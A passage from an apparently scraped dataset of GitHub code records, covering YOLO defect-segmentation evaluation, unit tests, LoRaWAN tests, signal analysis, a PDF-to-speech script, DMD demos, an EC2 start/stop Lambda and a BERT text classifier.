'spall':\r\n merged_annotatemask[mask[i,...]==True] = 2\r\n elif class_names[i] == 'rebar':\r\n merged_annotatemask[mask[i,...]==True] = 3 \r\n\r\n # generate masklabel for computing mask-level mAP\r\n mask_index = np.where(np.any(mask, axis= (1,2)))[0]\r\n assert len(mask_index)==len(class_names)\r\n masklabel = []\r\n for index in mask_index:\r\n eachclass = class_names[index]\r\n classid = self.class_to_ind[eachclass]\r\n eachmask = mask[index,...]\r\n masklabel.append({'imageid': imname, 'classid': classid, 'difficult': int(0), 'mask': eachmask})\r\n \r\n return masklabel, merged_annotatemask\r\n\r\n def correct_yolo_boxes(self, x1, y1, x2, y2, image_h, image_w, net_h, net_w):\r\n\r\n if (float(net_w)/image_w) < (float(net_h)/image_h):\r\n new_w = net_w\r\n new_h = (image_h*net_w)//image_w\r\n else:\r\n new_h = net_h\r\n new_w = (image_w*net_h)//image_h\r\n \r\n x_offset, x_scale = float((net_w - new_w)//2)/net_w, float(new_w)/net_w\r\n y_offset, y_scale = float((net_h - new_h)//2)/net_h, float(new_h)/net_h\r\n \r\n x1 = max(min(np.around((x1 - x_offset) / x_scale * image_w).astype(np.int32), image_w), 0)\r\n x2 = max(min(np.around((x2 - x_offset) / x_scale * image_w).astype(np.int32), image_w), 0)\r\n y1 = max(min(np.around((y1 - y_offset) / y_scale * image_h).astype(np.int32), image_h), 0)\r\n y2 = max(min(np.around((y2 - y_offset) / y_scale * image_h).astype(np.int32), image_h), 0)\r\n \r\n return x1, y1, x2, y2\r\n\r\n# def sigmoid(self, x):\r\n# return 1. / (1. + np.exp(-x))\r\n\r\n def sigmoid(self, x):\r\n a = -1. * x\r\n a = np.clip(a, -50., 50.)\r\n a = 1. / (1. + np.exp(a))\r\n return a\r\n\r\ndef image_read(image_rgb, image_size):\r\n \r\n window = np.array([0., 0., 1., 1.], dtype=np.float32)\r\n imgh, imgw, _ = image_rgb.shape\r\n if (float(image_size)/imgw) < (float(image_size)/imgh): \r\n imgh = (imgh * image_size)//imgw\r\n imgw = image_size\r\n else:\r\n imgw = (imgw * image_size)//imgh\r\n imgh = image_size\r\n\r\n image = image_rgb.astype(np.float32)\r\n image = cv2.resize(image, (imgw, imgh),interpolation = cv2.INTER_LINEAR)\r\n\r\n # prepare the window for clip_boxes in testing mode\r\n top = (image_size - imgh)//2\r\n left = (image_size - imgw)//2\r\n window[0] = top / image_size\r\n window[1] = left / image_size\r\n window[2] = (imgh + top) / image_size\r\n window[3] = (imgw + left) / image_size\r\n\r\n # embed the image into standard letter box\r\n new_image = np.ones((image_size, image_size, 3)) * 127.\r\n new_image[(image_size - imgh)//2:(image_size + imgh)//2, \r\n (image_size - imgw)//2:(image_size + imgw)//2, :]= image \r\n new_image = new_image / 255.0\r\n return new_image, window\r\n\r\n\r\n''' Computing mask-level mAP and mIoU '''\r\ndef evaluate(weights_file, test_path, net, eval_map):\r\n\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n saver = tf.train.Saver()\r\n saver.restore(sess, weights_file)\r\n \r\n txtname = os.path.join(test_path, 'cache', 'test.txt')\r\n with open(txtname, 'r') as f:\r\n image_index = [x.strip() for x in f.readlines()]\r\n\r\n val_mask = eval_map.groundtruth[0]\r\n val_mergemask = eval_map.groundtruth[1]\r\n val_index = eval_map.groundtruth[3]\r\n \r\n t_prediction = 0\r\n t_crop_assemble = 0 \r\n \r\n det_masks = {}\r\n detfile = {}\r\n cracklist = []\r\n spalllist = []\r\n rebarlist = [] \r\n for i, index in enumerate(image_index):\r\n print(index)\r\n assert index==val_index[i]\r\n \r\n imname = os.path.join(test_path, 'images', index + '.jpg')\r\n image_rgb = cv2.cvtColor(cv2.imread(imname), cv2.COLOR_BGR2RGB) \r\n image_h, image_w, _ = image_rgb.shape \r\n input_image, input_window = image_read(image_rgb, cfg.TEST_SIZE)\r\n image_array = np.expand_dims(input_image, 0)\r\n window_array = np.expand_dims(input_window, 0)\r\n \r\n feed_val = {net.is_training: False, net.det_thresh: [np.float32(cfg.OBJ_THRESHOLD)], \r\n net.clip_window: window_array, net.images: image_array}\r\n\r\n t = time.time()\r\n det_box, det_mask = sess.run(net.evaluation, feed_dict=feed_val)\r\n t_prediction += (time.time() - t)\r\n \r\n if np.sum(det_mask[0]) == 0.0:\r\n merged_detectmask = np.zeros((image_h, image_w), dtype=np.uint8)\r\n det_masks[index] = merged_detectmask\r\n continue\r\n \r\n proposals = det_box[0][:, :4]\r\n classids = (det_box[0][:, 4]).astype(int)\r\n class_confs = det_box[0][:, 5]\r\n mask_out = det_mask[0]\r\n \r\n merged_detectmask = np.zeros((image_h, image_w), dtype=np.uint8)\r\n # correct the boxes and masks into original image size\r\n for k in range(len(classids)):\r\n classid = classids[k]\r\n score = class_confs[k]\r\n pred_mask = mask_out[k]\r\n \r\n # correct boxes\r\n y1_norm, x1_norm, y2_norm, x2_norm = proposals[k,:]\r\n x1, y1, x2, y2 = eval_map.correct_yolo_boxes(x1_norm, y1_norm, x2_norm, y2_norm, image_h, image_w, cfg.TEST_SIZE, cfg.TEST_SIZE)\r\n\r\n if (y2-y1)*(x2-x1) <= 0:\r\n continue\r\n\r\n # correct masks\r\n t = time.time()\r\n size = pred_mask.shape[0]\r\n y1_norm = np.around(y1_norm * size).astype(np.int32)\r\n x1_norm = np.around(x1_norm * size).astype(np.int32)\r\n y2_norm = np.around(y2_norm * size).astype(np.int32)\r\n x2_norm = np.around(x2_norm * size).astype(np.int32) \r\n crop_mask = pred_mask[y1_norm:y2_norm, x1_norm:x2_norm]\r\n mask = cv2.resize(crop_mask, (x2 - x1, y2 - y1), interpolation = cv2.INTER_LINEAR)\r\n mask = np.where(mask > 0.5, 1, 0).astype(np.bool)\r\n full_mask = np.zeros([image_h, image_w], dtype=np.bool)\r\n full_mask[y1:y2, x1:x2] = mask\r\n t_crop_assemble += (time.time() - t)\r\n \r\n if classid==0:\r\n cracklist.append({'imageid': index, 'score': score, 'mask': full_mask})\r\n merged_detectmask[full_mask==True] = 1\r\n elif classid==1:\r\n spalllist.append({'imageid': index, 'score': score, 'mask': full_mask})\r\n merged_detectmask[full_mask==True] = 2\r\n elif classid==2:\r\n rebarlist.append({'imageid': index, 'score': score, 'mask': full_mask})\r\n merged_detectmask[full_mask==True] = 3\r\n\r\n det_masks[index] = merged_detectmask \r\n \r\n detfile['0']=cracklist\r\n detfile['1']=spalllist\r\n detfile['2']=rebarlist\r\n\r\n # compute mask-level AP and mAP\r\n thresh = 0.5\r\n thresh_out = []\r\n res = []\r\n pres = []\r\n aps = []\r\n for i, clsid in enumerate(eval_map.classid):\r\n if not detfile[str(clsid)]:\r\n recall = 0.\r\n precision = 0.\r\n ap = 0.\r\n res += [recall]\r\n pres += [precision] \r\n aps += [ap]\r\n continue\r\n recall, precision, ap = voc_eval(detfile[str(clsid)], val_mask, txtname, \r\n clsid, ovthresh= thresh, use_07_metric = False)\r\n res += [recall]\r\n pres += [precision]\r\n aps += [ap]\r\n \r\n mean_rec = np.mean(res)\r\n mean_prec = np.mean(pres)\r\n mean_ap = np.mean(aps) \r\n thresh_out.append({'thresh': thresh, 'AP': aps, 'mAP': [mean_rec, mean_prec, mean_ap]})\r\n \r\n t_prediction = t_prediction + t_crop_assemble\r\n print(\"Prediction time: {}. Average {}/image\".format(t_prediction, t_prediction / len(image_index)))\r\n\r\n # compute semantic segmentation accuracy mIoU\r\n p_bg = [0, 0, 0, 0] \r\n p_crack = [0, 0, 0, 0]\r\n p_spall = [0, 0, 0, 0]\r\n p_rebar = [0, 0, 0, 0] \r\n \r\n num_all_true_pixels = 0\r\n for index in val_index:\r\n true_mask = val_mergemask[index]\r\n pred_mask = det_masks[index]\r\n assert true_mask.shape == pred_mask.shape\r\n \r\n num_all_true_pixels = num_all_true_pixels + int(true_mask.shape[0] * true_mask.shape[1])\r\n \r\n # prediction = background(bg)\r\n p_bg[0] = p_bg[0] + np.sum((true_mask==0) * (pred_mask==0))\r\n p_crack[0] = p_crack[0] + np.sum((true_mask==1) * (pred_mask==0))\r\n p_spall[0] = p_spall[0] + np.sum((true_mask==2) * (pred_mask==0))\r\n p_rebar[0] = p_rebar[0] + np.sum((true_mask==3) * (pred_mask==0))\r\n # prediction = crack\r\n p_bg[1] = p_bg[1] + np.sum((true_mask==0) * (pred_mask==1))\r\n p_crack[1] = p_crack[1] + np.sum((true_mask==1) * (pred_mask==1))\r\n p_spall[1] = p_spall[1] + np.sum((true_mask==2) * (pred_mask==1))\r\n p_rebar[1] = p_rebar[1] + np.sum((true_mask==3) * (pred_mask==1))\r\n # prediction = spall\r\n p_bg[2] = p_bg[2] + np.sum((true_mask==0) * (pred_mask==2))\r\n p_crack[2] = p_crack[2] + np.sum((true_mask==1) * (pred_mask==2))\r\n p_spall[2] = p_spall[2] + np.sum((true_mask==2) * (pred_mask==2))\r\n p_rebar[2] = p_rebar[2] + np.sum((true_mask==3) * (pred_mask==2))\r\n # prediction = rebar\r\n p_bg[3] = p_bg[3] + np.sum((true_mask==0) * (pred_mask==3))\r\n p_crack[3] = p_crack[3] + np.sum((true_mask==1) * (pred_mask==3))\r\n p_spall[3] = p_spall[3] + np.sum((true_mask==2) * (pred_mask==3))\r\n p_rebar[3] = p_rebar[3] + np.sum((true_mask==3) * (pred_mask==3))\r\n \r\n bg_iou = p_bg[0] / (np.sum(p_bg) + p_bg[0] + p_crack[0] + p_spall[0] + p_rebar[0] - p_bg[0])\r\n crack_iou = p_crack[1] / (np.sum(p_crack) + p_bg[1] + p_crack[1] + p_spall[1] + p_rebar[1] - p_crack[1])\r\n spall_iou = p_spall[2] / (np.sum(p_spall) + p_bg[2] + p_crack[2] + p_spall[2] + p_rebar[2] - p_spall[2])\r\n rebar_iou = p_rebar[3] / (np.sum(p_rebar) + p_bg[3] + p_crack[3] + p_spall[3] + p_rebar[3] - p_rebar[3])\r\n miou = np.mean([bg_iou, crack_iou, spall_iou, rebar_iou])\r\n \r\n mask_acc = [bg_iou, crack_iou, spall_iou, rebar_iou, miou]\r\n \r\n return thresh_out, mask_acc\r\n\r\n \r\nif __name__ == '__main__': \r\n \r\n os.environ['CUDA_VISIBLE_DEVICES'] = cfg.GPU\r\n \r\n cfg.BATCH_SIZE = 1\r\n \r\n yolo = YOLONet(False)\r\n \r\n test_path = os.path.join(cfg.DATASET, \"test\")\r\n test_weight = os.path.join(cfg.OUTPUT_DIR, \"TRAINED MODEL\")\r\n \r\n eval_map = MAP(test_path, evaluation=True) \r\n\r\n thresh_out, mask_acc = evaluate(test_weight, test_path, yolo, eval_map)\r\n \r\n print('AP of each class: ' + ' crack ' + str(format(thresh_out[0]['AP'][0], '.3f'))\r\n + ' spall ' + str(format(thresh_out[0]['AP'][1], '.3f'))\r\n + ' rebar ' + str(format(thresh_out[0]['AP'][2], '.3f')))\r\n print('mAP: ' + ' recall ' + str(format(thresh_out[0]['mAP'][0], '.3f'))\r\n + ' precision ' + str(format(thresh_out[0]['mAP'][1], '.3f'))\r\n + ' mAP ' + str(format(thresh_out[0]['mAP'][2], '.3f')))\r\n","repo_name":"ZHANGKEON/DIS-YOLO","sub_path":"calculate_test_map.py","file_name":"calculate_test_map.py","file_ext":"py","file_size_in_byte":15740,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"19225214000","text":"import unittest\nfrom algorithms.lists import LinkedListFactory\nfrom algorithms.lists import SteppedSingleLinkedListIterator\nfrom ddt import ddt, data, unpack\n\n\n@ddt\nclass SteppedSingleLinkedListIteratorTest(unittest.TestCase):\n\n @data(([1], 2), ([1, 2], 2), ([1, 2, 3, 4], 2))\n @unpack\n def test_stepped_iterator(self, original_list, step):\n linked_list = LinkedListFactory.create(original_list)\n\n iterator = SteppedSingleLinkedListIterator(linked_list, step)\n\n self.verify_iterator(iterator, original_list, step)\n\n def verify_iterator(self, iterator, original_list, step):\n for i in range(0, len(original_list), step):\n self.assertTrue(iterator.has_next())\n self.assertEqual(original_list[i], iterator.next().val)\n\n self.assertFalse(iterator.has_next())\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"emystein/python-exercises","sub_path":"tests/test_single_linked_list_stepped_forward_iterator.py","file_name":"test_single_linked_list_stepped_forward_iterator.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2770591672","text":"import json\nimport os\n\nfilepath = 'UserData'\n\n\ndef user_exists(user):\n if os.path.exists(f'{filepath}/{user.id}.json'):\n load_user(user.id)\n return\n else:\n save_user(user.id, {'name': str(user),\n 'id': user.id,\n 'timers': [],\n 'friends': []})\n return\n\ndef load_user(id):\n with open(f'{filepath}/{id}.json', 'r') as f:\n data = json.load(f)\n\n return data\n\ndef save_user(id,data):\n with open(f'{filepath}/{id}.json', 'w+') as f:\n json.dump(data, f, indent=4)\n\n\ndef load_users():\n end = {}\n for user in os.listdir(filepath):\n with open(f'{filepath}/{user}', 'r+') as f:\n end[user] = json.load(f)\n\n return end\n\n\ndef add_attribute(name, value):\n for user in os.listdir(filepath):\n with open(f'{filepath}/{user}', 'r+') as f:\n current = json.load(f)\n\n current[name] = value\n\n with open(f'{filepath}/{user}', 'w+') as f:\n json.dump(current, f, indent=4)\n\n\nif __name__ == '__main__':\n add_attribute('friends', [])\n\n","repo_name":"chluebi/timerbot","sub_path":"files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30864795577","text":"import argparse\nimport asyncio\nimport sys\n\nfrom devtest import DeviceTest, LoRaWANTest\nfrom vtimeloop import VirtualTimeLoop\n\nclass ExJoinTest(LoRaWANTest):\n @DeviceTest.test()\n async def join(self) -> bool:\n await self.lw_join()\n await self.lw_uplink()\n return True\n\n @DeviceTest.test()\n async def uplink(self) -> bool:\n await self.lw_join()\n t1 = None\n for _ in range(5):\n m = await self.lw_uplink()\n self.assert_eq(m['FRMPayload'], b'hello')\n t0 = t1\n t1 = asyncio.get_event_loop().time()\n if t0 is not None:\n self.assert_range((t1 - t0), 5, 10)\n return True\n\n @DeviceTest.test()\n async def dnlink(self) -> bool:\n await self.lw_join()\n m = await self.lw_uplink()\n self.lw_dnlink(m, port=15, payload=b'hi there!')\n await asyncio.sleep(5)\n return True\n\n\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser()\n LoRaWANTest.stdargs(p)\n args = p.parse_args()\n\n if args.virtual_time:\n asyncio.set_event_loop(VirtualTimeLoop()) # type: ignore\n\n test = ExJoinTest(args)\n\n if not asyncio.get_event_loop().run_until_complete(test.run()):\n sys.exit(1)\n","repo_name":"lorabasics/basicmac","sub_path":"projects/ex-join/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"76"} +{"seq_id":"42209717252","text":"import numpy, scipy.io.wavfile,matplotlib.pyplot as plt\nfrom mysignal import play, tone\n\ndef mag2dB(x):\n return 20 * numpy.log10(x / max(x))\n\ndef plotfft(x, sampling_rate=1,logscale=False, n=None):\n f=numpy.fft.rfft(x,n)\n mag=numpy.abs(f)\n #mag[mag<0.1]=0\n\n fig1 = plt.figure()\n if logscale:\n mag=mag2dB(mag)\n plt.plot(numpy.arange(mag.size,dtype=numpy.float32)/mag.size*sampling_rate/2, mag, color=\"g\")\n #deltafreq=rate/mag.size\n plt.show()\n\ndef find_tones(x, sampling_rate=1, tresh=0.8, logscale=False, n=None):\n f=numpy.fft.rfft(x,n)\n #f=f[:f.size/2]\n mag=numpy.abs(f)\n if logscale:\n mag=mag2dB(mag)\n return numpy.where(mag>tresh*numpy.max(mag))[0]*sampling_rate/(mag.size*2)\n\ndef signalogram(x,frame_size=512, overlap=0.5):\n advance=int(frame_size*overlap)\n size = int(numpy.ceil(x.size / advance))\n ret=numpy.zeros(shape=(frame_size, size))\n for i in range(size):\n frame = x[int(advance * i):int(advance * i + frame_size)]\n frame=numpy.hstack((frame,numpy.zeros(frame_size-frame.size)))\n ret[:,i]= frame\n return ret\n\ndef plotSignalogram(signal,frame_size=512):\n sgnmat = signalogram(signal, frame_size)\n ft=numpy.abs(numpy.fft.rfft(sgnmat, axis=0))#*numpy.hamming(frame_size)\n print(sgnmat.shape,ft.shape)\n fig1 = plt.figure()\n plt.imshow(ft, cmap=\"hot\", origin=\"lower\")\n plt.show()\n\nif __name__==\"__main__\":\n rate, signal = scipy.io.wavfile.read(\"zvizg.wav\")\n plotSignalogram(signal)\n \"\"\"def f(x):\n return numpy.convolve(x,(0.2,0.2,0.2,0.2,0.2))\n ins=f(tone(250, 1000, 1, 3, 0))\n fftlength=512\n plotfft(numpy.hstack(((0.2,0.2,0.2,0.2,0.2), numpy.zeros(fftlength-5))),1000)\n\"\"\"\n \"\"\"\n signal = tone(24, 50, 3, 0.45, 0) + tone(6.01, 50, 3, 0.9, 0)\n #rate,signal=scipy.io.wavfile.read(\"aaa.wav\")\n print(find_tones(signal,50,0.5))\n plotfft(signal,50)\"\"\"","repo_name":"t4c1/DSP","sub_path":"freqencyAnalysis.py","file_name":"freqencyAnalysis.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36850532469","text":"import os\nimport sys\n\nimport requests\nfrom PyPDF2 import PdfReader\n\nAPI_BASE_URL = \"http://api.voicerss.org/\"\nAPI_KEY = os.getenv(\"API_KEY\")\nMAX_CHARACTERS = 1000\n\npdf_file_path = sys.argv[1]\npdf_language = sys.argv[2] if len(sys.argv) > 2 else \"pl-pl\"\n\nreader = PdfReader(pdf_file_path)\ntext = \"\"\n\nfor page in reader.pages:\n text += page.extract_text() + \"\\n\"\n\nwith open(\"pdftext\", \"w\") as file:\n file.write(text)\n\n\ndef crop_text(text):\n if len(text) > MAX_CHARACTERS:\n return (text[i:i + MAX_CHARACTERS]\n for i in range(0, len(text), MAX_CHARACTERS))\n\n\ndef get_speech_from_text(text, language=\"pl-pl\", audio_codec='MP3'):\n for chunk in crop_text(text):\n params = {\n \"key\": API_KEY,\n \"src\": chunk,\n \"c\": audio_codec,\n \"hl\": language\n }\n req = requests.get(API_BASE_URL, params=params, stream=True)\n with open(\"new_mp3.mp3\", 'ab') as file:\n for chunk in req.iter_content(chunk_size=128):\n file.write(chunk)\n\n\nif __name__ == \"__main__\":\n get_speech_from_text(text, pdf_language)\n","repo_name":"ErykKnesz/Text-to-speech","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17210724184","text":"#!/usr/bin/env python\n\"\"\"\nLOOK AT remove_duplicates_array_2.py\n\nGiven a sorted array, remove the duplicates in place such that each element appear only once and return the new length.\n\nDo not allocate extra space for another array, you must do this in place with constant memory.\n\nFor example,\nGiven input array A = [1,1,2],\n\nYour function should return length = 2, and A is now [1,2].\n\"\"\"\n\ndef removeDuplicates(A):\n\n if not A:\n return 0\n\n if len(A) < 2:\n return len(A)\n\n p = 0 # position of last unique element\n\n for i in range(1, len(A)):\n if A[i] != A[i - 1]:\n p += 1\n A[p] = A[i]\n\n return p + 1 # since we have 0 indexing\n","repo_name":"ashutosh-narkar/LeetCode","sub_path":"remove_duplicates_array_1.py","file_name":"remove_duplicates_array_1.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37111572833","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.integrate import odeint\nfrom sklearn.preprocessing import PolynomialFeatures\n\ndef duffing_oscillator(y, t):\n y1, y2 = y\n dydt1 = y2\n dydt2 = y1 - y1**3 \n dydt = np.array([dydt1, dydt2])\n return dydt\n\ndef DMD(X,Xprime,r):\n U,Sigma,VT = np.linalg.svd(X,full_matrices=0) # Step 1\n Ur = U[:,:r]\n Sigmar = np.diag(Sigma[:r])\n VTr = VT[:r,:]\n Atilde = np.linalg.solve(Sigmar.T,(Ur.T @ Xprime @ VTr.T).T).T # Step 2\n Lambda, W = np.linalg.eig(Atilde) # Step 3\n Lambda = np.diag(Lambda)\n \n Phi = Xprime @ np.linalg.solve(Sigmar.T,VTr).T @ W # Step 4\n # alpha1 = Sigmar @ VTr[:,0]\n # b = np.linalg.solve(W @ Lambda,alpha1)\n return Phi, Lambda\n\ndef DMDc(X, Xprime, C, p, r):\n Omega = np.concatenate((X, C), axis=0)\n n1 = X.shape[0]\n n2 = C.shape[0]\n\n U_in, Sigma_in, VT_in = np.linalg.svd(Omega,full_matrices=0)\n U_inr = U_in[:,:p]\n Sigma_inr = Sigma_in[:p]\n VT_inr = VT_in[:p,:]\n\n U_inr1 = U_inr[:n1,:]\n U_inr2 = U_inr[n1:, :]\n\n U_out, Sigma_out, VT_out = np.linalg.svd(Xprime, full_matrices=0)\n U_outr = U_out[:,:r]\n Sigma_outr = Sigma_out[:r]\n VT_outr = VT_out[:r,:]\n\n Atilde = np.linalg.multi_dot([U_outr.T.conj(), Xprime, VT_inr.T,\n np.diag(np.reciprocal(Sigma_inr)), U_inr1.T.conj(), U_outr])\n \n Btilde = np.linalg.multi_dot([U_outr.T.conj(), Xprime, VT_inr.T,\n np.diag(np.reciprocal(Sigma_inr)), U_inr2.T.conj()])\n \n Lambda, W = np.linalg.eig(Atilde)\n\n Phi = np.linalg.multi_dot([Xprime, VT_inr.T,\n np.diag(np.reciprocal(Sigma_inr)), U_inr1.T.conj(), U_outr, W])\n\n return Atilde, Btilde, U_outr\n \n\n\n\n\n\ndef collect_data(n_sim, time, n_steps):\n ymin = -1.5\n ymax = 1.5\n X = None\n Xprime = None\n for _ in range(n_sim):\n y = np.random.random(2)*(ymax-ymin) + ymin\n t = np.linspace(0, time, n_steps)\n sol = odeint(duffing_oscillator, y, t)\n if X is None and Xprime is None:\n X = sol.T[:,:-1]\n Xprime = sol.T[:,1:]\n else:\n X = np.concatenate((X, sol.T[:,:-1]), axis=1)\n Xprime = np.concatenate((Xprime, sol.T[:,1:]), axis=1)\n \n return X, Xprime\n\nif __name__ == \"__main__\":\n\n n_sim = 300\n time = 15\n n_step = 100\n\n X, Xp = collect_data(n_sim, time, n_step)\n\n degree = 5\n poly = PolynomialFeatures(5)\n X_lifted = poly.fit_transform(X.T).T\n Xp_lifted = poly.fit_transform(Xp.T).T\n\n r = min(X_lifted.shape)\n Phi, Lambda = DMD(X_lifted, Xp_lifted, r)\n\n ymin = -1.5\n ymax = 1.5\n y = np.random.random(2)*(ymax-ymin) + ymin\n y_lifted = poly.fit_transform(y.reshape((1,-1))).squeeze()\n\n b = np.linalg.solve(Phi, y_lifted)\n\n sol_recon = []\n\n for i in range(n_step):\n x = np.real(Phi@np.linalg.matrix_power(Lambda, i)@b)\n sol_recon.append(x)\n\n sol_recon = np.array(sol_recon)\n\n t = np.linspace(0, time, n_step)\n sol_exact = odeint(duffing_oscillator, y, t)\n\n print(f'Initial condition: {y[0]}, {y[1]}')\n\n # plt.plot(sol_exact[:, 0], sol_exact[:, 1], label='exact')\n # plt.plot(sol_recon[:, 1], sol_recon[:, 2], label='reconstructed')\n\n plt.plot(t, sol_exact[:, 0], label='exact')\n plt.plot(t, sol_recon[:, 1], label='reconstructed')\n\n plt.legend()\n plt.show()\n","repo_name":"maroun96/burger-control-dmd","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26825365286","text":"import os\nimport csv\nimport torch\nimport argparse\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom transformers import InputExample, InputFeatures\nfrom transformers import BertConfig, BertForSequenceClassification, BertTokenizer, BertModel\nfrom transformers import glue_convert_examples_to_features as convert_examples_to_features\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nbert_model = (BertConfig, BertForSequenceClassification, BertTokenizer)\n\n\ndef create_examples(lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n del lines[0]\n for (i, line) in enumerate(lines):\n guid = \"%s-%s\" % (set_type, i)\n # label = int(line[1])\n # CNM!!@!!\n text_a = line[2].replace(\"YZYHUST\", ',')\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=None, label=None))\n return examples\n\n\ndef Load_data(args, tokenizer):\n csv.field_size_limit(500 * 1024 * 1024)\n with open(os.path.join(args.data_dir, 'val.csv'), 'r') as f:\n examples = create_examples(list(csv.reader(f)), 'predict')\n label_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n features = convert_examples_to_features(\n examples,\n tokenizer,\n label_list=label_list,\n max_length=args.max_seq_length,\n output_mode=\"classification\",\n )\n all_input_ids = torch.tensor([f.input_ids for f in features],\n dtype=torch.long)\n all_attention_mask = torch.tensor([f.attention_mask for f in features],\n dtype=torch.long)\n all_token_type_ids = torch.tensor([f.token_type_ids for f in features],\n dtype=torch.long)\n dataset = TensorDataset(all_input_ids, all_attention_mask,\n all_token_type_ids)\n return DataLoader(dataset, batch_size=16)\n\n\n#all in main\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--data_dir\",\n default=\"bert/url/predict\", #need to be changed for debug\n type=str,\n required=False,\n help=\"Locate the dataset\")\n parser.add_argument(\"--model_dir\",\n default='bert/model',\n type=str,\n required=False,\n help=\"Locate the pre-trained model\")\n parser.add_argument(\"--max_seq_length\",\n default=256,\n type=int,\n required=False)\n args = parser.parse_args()\n\n config_class, model_class, tokenizer_class = bert_model\n\n # Load Bert\n config = config_class.from_pretrained(args.model_dir, num_labels=13)\n tokenizer = tokenizer_class.from_pretrained(args.model_dir)\n model = model_class.from_pretrained(args.model_dir,\n from_tf=False,\n config=config)\n model.to(device)\n #Load Data\n #pipeline: file->example->features\n pred_dataloader = Load_data(args, tokenizer)\n #Predict\n preds = None\n for batch in tqdm(pred_dataloader, desc=\"Evaluating\"):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n\n with torch.no_grad():\n inputs = {\n 'input_ids': batch[0],\n 'attention_mask': batch[1],\n }\n inputs['token_type_ids'] = batch[2]\n outputs = model(**inputs)\n\n logits = outputs[0]\n\n if preds is None:\n preds = logits.detach().cpu().numpy()\n else:\n preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)\n\n m = torch.nn.Softmax(dim=1)\n prob = np.array(m(torch.Tensor(preds)))\n pred = np.argmax(preds, axis=1)\n pred = pd.DataFrame(pred)\n prob = pd.DataFrame(prob)\n prob.columns = [\n '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'\n ]\n pred.columns = ['pred']\n prediction = pd.concat([pred, prob], axis=1)\n # save results\n prediction.to_csv(index=None, path_or_buf='./predict.csv')\n\n\nif __name__ == \"__main__\":\n print(\"current device:\", device)\n main()\n","repo_name":"Imcaicai/FCS","sub_path":"bert/buffer/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"42121410001","text":"import json\nimport datetime\nimport boto3\n\ninstance_ID = 'L25004-EC2-Scheduling-TEST'\n\ndef lambda_handler(event, context):\n client = boto3.client('ec2') #ec2 client 불러오기\n response = client.describe_instances() # 계정에 있는 EC2 instance 모두 할당\n \n ec2_list = [] # 타겟 EC2를 저장하기 위한 리스트. start_instances or stop_instances의 경우, 리스트 인자를 필수적으로 할당해줘야 함\n is_Running = False\n \n for ec2 in response['Reservations']:\n for instance in ec2['Instances']:\n for tags in instance['Tags']:\n if tags['Key'] == 'Name':\n if instance_ID in tags['Value']: # 만약 찾고자 하는 instance가 있는 경우\n print(\"\\n=== FIND TARGET EC2 ===\")\n print(tags['Value'] + ' : ' + instance['InstanceId'] + '\\n')\n ec2_list.append(instance['InstanceId'])\n \n if instance['State']['Code'] == 16: # running(16) # 현재 running 중이면 is_Running을 True로 갱신\n is_Running = True\n else : # 그렇지 않다면 False\n is_Running = False\n\n\n if is_Running == False : # 현재 EC2가 running 중이지 않으므로 start해준다\n start = client.start_instances(InstanceIds = ec2_list)\n print(\"=== SERVER START ====\")\n return start\n else : # 현재 타겟 EC2가 running 중이라면 Stop해준다.\n stop = client.stop_instances(InstanceIds = ec2_list)\n print(\"=== SERVER STOP ====\")\n return stop\n\n\n'''\n### client 내용 설명 ###\nclient.describe_instances()\nreturn >> https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_instances\n\n### start_instances, stop_instances 함수 인자 설명 ###\nstart_instances(InstanceIds(list), AdditionalInfo(str), DryRun(boolean))\n>> client.start_instances(\n InstanceIds=[\n 'string',\n ],\n AdditionalInfo='string',\n DryRun=True|False\n)\n\n### instance['State']['Code']의 리턴값. 각 상태에 따라 고유 넘버가 존재함 ###\n# code value: 0 (pending), 16 (running), 32 (shutting-down), 48 (terminated), 64 (stopping), and 80 (stopped)\n\ncron(0 9/8 ? * MON-FRI *) 평일 9~17시\n'''","repo_name":"Flare-k/CICD_Pipeline","sub_path":"EC2_Scheduling/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43101570681","text":"from email import header\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nfrom bs4 import BeautifulSoup\nimport 